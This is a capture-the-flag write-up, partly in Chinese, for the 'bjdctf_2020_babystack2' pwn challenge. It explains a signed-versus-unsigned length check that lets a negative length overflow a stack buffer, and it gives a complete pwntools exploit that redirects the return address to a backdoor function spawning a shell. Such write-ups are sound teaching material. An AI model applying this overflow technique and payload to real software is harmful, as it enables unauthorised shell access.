
bjdctf_2020_babystack2

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babystack2/bjdctf_2020_babystack2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

main()

/*
 * main() as decompiled by IDA from the challenge binary.
 *
 * Flow: set stdio unbuffered, print a banner, read a length into nbytes,
 * reject it only when (int)nbytes > 10, then read() that many bytes into
 * buf. buf is declared as 12 bytes at rbp-0x10, so the saved rbp and the
 * return address lie right after the 16 bytes below rbp.
 *
 * Root cause of the bug: the bound check is a signed compare, but read()
 * receives (unsigned int)nbytes. A negative length passes the check and
 * turns into a very large byte count, so read() can write far past buf.
 * Only the low 32 bits of nbytes are ever set (LODWORD), which is why the
 * casts matter. The fix is to reject nbytes < 0 (or compare the value as
 * an unsigned count against sizeof buf) before calling read().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[12]; // [rsp+0h] [rbp-10h] BYREF   -- 16 bytes below the saved rbp
size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF   -- only the low 32 bits are written

setvbuf(_bss_start, 0LL, 2, 0LL); // presumably stdout (decompiler symbol) -- unbuffered
setvbuf(stdin, 0LL, 1, 0LL);      // stdin line-buffered
LODWORD(nbytes) = 0;
puts("**********************************");
puts("* Welcome to the BJDCTF! *");
puts("* And Welcome to the bin world! *");
puts("* Let's try to pwn the world! *");
puts("* Please told me u answer loudly!*");
puts("[+]Are u ready?");
puts("[+]Please input the length of your name:");
__isoc99_scanf("%d", &nbytes);
if ( (int)nbytes > 10 ) // signed check: negative values are NOT rejected
{
puts("Oops,u name is too long!");
exit(-1);
}
puts("[+]What's u name?");
read(0, buf, (unsigned int)nbytes); // unsigned count; buf is only 16 bytes from rbp
return 0;
}

可疑函数backdoor()

/*
 * backdoor(): spawns a shell via system("/bin/sh") and returns 1.
 *
 * Nothing in main() calls this function; it is only reachable if control
 * flow is diverted to it. The binary is not PIE, so its address (0x400726)
 * is fixed. A function like this should not exist in a production build;
 * combined with the signedness bug in main() it is what makes the
 * overflow directly exploitable.
 */
__int64 backdoor()
{
system("/bin/sh");
return 1LL;
}

// backdoor() 的地址：0x400726（No PIE，地址固定）

0x02


思路

1. nbytes > 10 时会 exit()，但这个比较是有符号的 (int)nbytes，而 read() 使用的是 (unsigned int)nbytes，所以把 nbytes 设为负数既能通过检查，又会让 read() 得到一个很大的长度

2. 利用 read() 的栈溢出，把返回地址覆盖为 backdoor()

s 0x10
rbp 0x8
ret backdoor()

0x03


exp

# Exploit script for bjdctf_2020_babystack2 (pwntools).
from pwn import *

# amd64 target; debug logging prints every byte exchanged with the process.
context(os='linux', arch='amd64', log_level='debug')
io = process(['./bjdctf_2020_babystack2'])
# io = remote('node4.buuoj.cn', 28972)
elf = ELF('./bjdctf_2020_babystack2')  # loaded but not used below

# The length check in main() is signed ((int)nbytes > 10) while read()
# receives (unsigned int)nbytes, so a negative length passes the check and
# read() accepts a huge byte count.
io.sendline(b'-200')

backdoor = 0x400726          # address of backdoor(); binary is not PIE
padding = 0x10 + 0x8         # buf -> saved rbp (0x10) plus the saved rbp itself (0x8)
payload = b'a' * padding
payload += p64(backdoor)     # overwrites main()'s return address
io.sendline(payload)
io.interactive()

